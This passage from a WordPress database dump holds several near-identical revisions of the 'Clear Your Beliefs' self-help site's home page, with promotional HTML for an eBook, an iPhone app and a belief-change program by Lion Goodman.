and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:35:46', '2014-10-24 06:35:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1622, 2, '2014-10-24 01:43:40', '2014-10-24 06:43:40', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:43:40', '2014-10-24 06:43:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1621, 2, '2014-10-24 01:39:39', '2014-10-24 06:39:39', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:39:39', '2014-10-24 06:39:39', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1624, 2, '2014-10-24 01:53:56', '2014-10-24 06:53:56', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;margin-top: 37px"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 70px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:53:56', '2014-10-24 06:53:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1625, 2, '2014-10-24 01:55:02', '2014-10-24 06:55:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;margin-top: 37px"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 30px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:55:02', '2014-10-24 06:55:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1626, 2, '2014-10-24 02:42:07', '2014-10-24 07:42:07', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em;margin-left: 10px;margin-bottom: -23px !important">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px;margin-bottom: 14px !important">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 02:42:07', '2014-10-24 07:42:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1628, 2, '2014-10-24 03:04:08', '2014-10-24 08:04:08', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;margin-top: 37px;font-size: 18px"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 30px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 03:04:08', '2014-10-24 08:04:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
